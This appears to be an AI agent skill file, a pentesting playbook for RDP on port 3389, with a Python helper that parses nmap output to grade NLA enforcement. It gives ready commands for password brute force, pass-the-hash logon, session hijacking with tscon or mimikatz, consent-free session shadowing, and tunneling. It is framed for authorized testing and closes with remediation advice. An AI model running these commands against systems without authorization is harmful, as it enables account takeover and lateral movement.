pentesting-rdp

$npx mdskill add xalgord/xalgorix/pentesting-rdp

---
name: pentesting-rdp
description: Testing the Remote Desktop Protocol (RDP, 3389/tcp ms-wbt-server) during authorized engagements. Covers
  encryption/NLA fingerprinting and NTLM info with nmap NSE, credential validation and pre/post-auth screenshots with
  netexec, password brute force (mindful of lockout), pass-the-hash logon with xfreerdp, session hijacking via tscon,
  RDS shadowing, RDP tunneling, and BlueKeep (CVE-2019-0708) / MS12-020 awareness.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- rdp
- windows
- lateral-movement
- session-hijacking
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting RDP (port 3389)

## When to Use

- During authorized assessments when TCP 3389 (ms-wbt-server) is open
- When fingerprinting the security layer (native RDP, TLS, CredSSP/NLA) and whether NLA is enforced
- When validating recovered credentials or NT hashes against RDP
- When you already hold a foothold and want to hijack or shadow an active session
- When assessing for BlueKeep (CVE-2019-0708) or MS12-020 on legacy hosts

## Quick Enumeration

```bash
# Encryption, DoS (MS12-020 safe check), and NTLM Windows info
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

# Security layer / NLA fingerprint
nmap --script rdp-enum-encryption -p 3389 <IP>

# netexec quick auth check (reports if NLA is required)
nxc rdp <IP> -u <user> -p <password>

# Pre-auth screenshot (only if NLA is disabled)
nxc rdp <IP> --nla-screenshot
```

## Critical: Checks Most Often Missed

1. **NLA disabled → pre-auth screenshot** — when Network Level Authentication is off, you can grab a login-screen screenshot pre-auth (`nxc rdp <IP> --nla-screenshot`), revealing logged-in usernames and host context.
2. **BlueKeep (CVE-2019-0708)** — pre-auth wormable RCE on legacy Windows (7/2008 R2 and older) with NLA off. Treat as critical; only exploit with explicit written authorization (the exploit can crash/BSOD the host).
3. **MS12-020** — RDP DoS / RCE on older hosts. The nmap script checks for it without triggering the DoS.
4. **Session hijacking via tscon** — with SYSTEM, you can attach to any user's existing RDP session without their password (`tscon <ID> /dest:<SESSIONNAME>`).
5. **RDS shadowing** — if shadowing policy allows, view/control another user's session, sometimes without consent (`mstsc /shadow:<ID> /noconsentprompt /control`).
6. **Weak / reused local admin creds + Restricted Admin** — pass-the-hash logon via `xfreerdp /pth:` when Restricted Admin mode is enabled.

How to CONFIRM: NLA status is confirmed by `nmap --script rdp-enum-encryption` and `nxc rdp` output. A valid credential is confirmed when `nxc rdp <IP> -u u -p p` shows `(+)`/`Pwn3d!`. BlueKeep candidacy is indicated by legacy OS + NLA off; confirm only via an authorized, non-destructive checker.
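An added Python triage helper (not part of this skill) that parses `nmap --script rdp-enum-encryption` output and decides whether NLA is actually enforced, grading the host the way the Output Format below expects. The two sample outputs are constructed, and the optional `product_version` argument (the `Product_Version` string from `rdp-ntlm-info`, e.g. `6.1.7601`) is an assumption used only to flag legacy OS + NLA off as a BlueKeep candidate.

```python
# Constructed sample: host that still negotiates the non-NLA security layers.
SAMPLE_NLA_OFF = """\
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|     Native RDP: SUCCESS
|     SSL: SUCCESS
|   RDP Encryption level: Client Compatible
|     40-bit RC4: SUCCESS
|     56-bit RC4: SUCCESS
|     128-bit RC4: SUCCESS
|     FIPS 140-1: SUCCESS
|_  RDP Protocol Version:  RDP 5.x, 6.x, 7.x, or 8.x server
"""

# Constructed sample: hardened host, only CredSSP succeeds. Only a literal
# "SUCCESS" counts as accepted; the exact error text for rejected layers is ignored.
SAMPLE_NLA_ON = """\
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|     Native RDP: HYBRID_REQUIRED_BY_SERVER
|     SSL: HYBRID_REQUIRED_BY_SERVER
|_  RDP Protocol Version:  RDP 5.x, 6.x, 7.x, or 8.x server
"""


def parse_rdp_enum_encryption(output):
    """Return {section: {entry: value}} from the script's indented output."""
    sections, current = {}, None
    for line in output.splitlines():
        if not line.startswith("|"):
            continue
        body = " " + line[2:] if line.startswith("|_") else line[1:]
        indent = len(body) - len(body.lstrip(" "))
        name, _, value = body.strip().partition(":")
        name, value = name.strip(), value.strip()
        if indent == 3:                       # section header (3 spaces deep)
            current = sections[name] = {}
            if value:                         # e.g. "RDP Encryption level: Client Compatible"
                current["_value"] = value
        elif indent > 3 and current is not None:
            current[name] = value
    return sections


def assess(output, product_version=""):
    """Grade NLA enforcement; product_version (assumed input) is the
    rdp-ntlm-info Product_Version, NT 6.1 and below = Win7/2008 R2 or older."""
    sec = parse_rdp_enum_encryption(output)
    accepted = {k for k, v in sec.get("Security layer", {}).items() if v == "SUCCESS"}
    non_nla = {k for k in accepted if not k.startswith("CredSSP")}
    enc = sec.get("RDP Encryption level", {})
    weak = sorted(k for k in ("40-bit RC4", "56-bit RC4") if enc.get(k) == "SUCCESS")
    parts = product_version.split(".")
    legacy = (len(parts) >= 2 and parts[0].isdigit() and parts[1].isdigit()
              and (int(parts[0]), int(parts[1])) <= (6, 1))
    findings = []
    if non_nla:
        findings.append("NLA not enforced; accepts " + ", ".join(sorted(non_nla)))
    if weak:
        findings.append("weak native RDP ciphers accepted: " + ", ".join(weak))
    if non_nla and legacy:
        findings.append("legacy OS with NLA off: BlueKeep (CVE-2019-0708) candidate")
    severity = ("Critical" if non_nla and legacy else "High" if non_nla
                else "Medium" if weak else "Info")
    return {"nla_enforced": not non_nla, "accepted_layers": sorted(accepted),
            "legacy_os": legacy, "severity": severity, "findings": findings}
```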

## Workflow

### Step 1: Enumerate (security layer, NLA, NTLM info)

```bash
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>
# rdp-ntlm-info leaks: target name, NetBIOS/DNS computer & domain name, OS build
nxc rdp <IP>                                            # banner + NLA requirement
```

### Step 2: Authenticate (validate creds, brute force, PtH)

```bash
# Validate a single credential / hash
nxc rdp <IP> -u <user> -p <password>
nxc rdp <IP> -u <user> -H <NTHASH>
rdp_check.py <domain>/<user>:<password>@<IP>            # impacket credential check

# Brute force — WARNING: can lock accounts; coordinate with the client
crowbar -b rdp -s <IP>/32 -U users.txt -c 'Password123'
hydra -L usernames.txt -p 'Password123' <IP> rdp

# Interactive logon
xfreerdp /u:<user> /p:<password> /v:<IP> [/d:domain]
xfreerdp /u:<user> /pth:<hash> /v:<IP> [/d:domain]      # pass-the-hash (Restricted Admin)
rdesktop -d <domain> -u <user> -p <password> <IP>
```

### Step 3: Post-auth screenshot / verify access

```bash
# Authenticated screenshot after valid login
nxc rdp <IP> -u <user> -p <password> --screenshot

# Add yourself to the RDP group if you have admin (post-exploitation)
net localgroup "Remote Desktop Users" <user> /add
```

### Step 4: Post-access / lateral movement (hijack, shadow, tunnel)

```bash
# Session hijacking with SYSTEM (no password needed)
query user                                              # list sessions + IDs
tscon <ID> /dest:<SESSIONNAME>                          # take over a session
# mimikatz alternative:
#   ts::sessions ; ts::remote /id:2

# RDS shadowing (view/control another session)
qwinsta /server:<IP>
mstsc /v:<IP> /shadow:<SESSION_ID> /control
mstsc /v:<IP> /shadow:<SESSION_ID> /noconsentprompt /prompt   # if policy allows
reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow

# Pivot/tunnel TCP over an RDP virtual channel (rdp2tcp)
xfreerdp /u:<user> /v:<IP> /rdp2tcp:/path/to/rdp2tcp/client/rdp2tcp

# Command exec without GUI / automation
# EvilRDP, SharpRDP — run shell/PowerShell, SOCKS proxy, clipboard, file transfer
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| **RDP** | Microsoft's graphical remote desktop protocol on TCP 3389 |
| **NLA (CredSSP)** | Network Level Authentication; requires auth before a session is created |
| **Security layer** | Negotiated as native RDP, TLS, or CredSSP/NLA |
| **Restricted Admin mode** | Allows pass-the-hash RDP logon without sending a cleartext password |
| **Session hijacking (tscon)** | Attaching to another user's session as SYSTEM without their password |
| **RDS shadowing** | Viewing/controlling another user's active session via mstsc |
| **BlueKeep (CVE-2019-0708)** | Pre-auth wormable RCE in legacy RDP |
| **MS12-020** | RDP vulnerability allowing DoS / potential RCE on older hosts |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **nmap** (rdp-* NSE) | Encryption, NLA, NTLM info, MS12-020 check |
| **netexec / crackmapexec** (rdp) | Credential check, NLA detection, pre/post-auth screenshots |
| **xfreerdp / rdesktop** | Interactive logon, pass-the-hash, rdp2tcp tunneling |
| **impacket rdp_check.py** | Validate credentials against RDP |
| **crowbar / hydra** | RDP brute force (lockout-aware) |
| **mstsc / tscon / qwinsta** | Native session listing, hijacking, shadowing |
| **EvilRDP / SharpRDP** | Automated command execution and clipboard/file abuse over RDP |

## Common Scenarios

### Scenario 1: NLA Disabled Recon
`nxc rdp <IP> --nla-screenshot` captures the login screen pre-auth, revealing the logged-in user and domain, which informs targeted credential attacks.

### Scenario 2: Pass-the-Hash Logon
A recovered local admin NT hash works with `xfreerdp /pth:` because Restricted Admin mode is enabled, granting an interactive desktop without cracking the password.

### Scenario 3: Session Hijacking
After gaining SYSTEM on a jump host, `query user` shows a Domain Admin's disconnected session; `tscon <ID> /dest:rdp-tcp#0` takes it over, inheriting their privileges.

### Scenario 4: BlueKeep Exposure
`rdp-ntlm-info` shows Windows 2008 R2 with NLA off. The host is flagged as a critical BlueKeep candidate and reported; exploitation proceeds only with written authorization on a maintenance window.

## Output Format

```
## RDP Finding

**Service**: Remote Desktop Protocol
**Severity**: <Critical|High|Medium>
**Host**: <IP>:3389
**NLA**: <enabled|disabled>   **OS**: <from rdp-ntlm-info>

### Summary
<What was found: weak creds, NLA off, BlueKeep candidate, session hijack, shadowing>

### Evidence
- Command: <nmap / nxc / xfreerdp>
- Output: <NLA status, (+)/Pwn3d!, screenshot path, vuln verdict>

### Access Obtained
| Method | Result |
|--------|--------|
| xfreerdp PtH | interactive desktop as <user> |
| tscon hijack | inherited <DomainAdmin> session |

### Recommendation
1. Require Network Level Authentication (NLA) on all RDP hosts
2. Patch BlueKeep (CVE-2019-0708) and MS12-020; decommission legacy OS
3. Restrict RDP to VPN/jump hosts and enforce MFA
4. Disable RDS shadowing without consent; audit shadow policy
5. Enforce strong, unique credentials and account lockout thresholds
```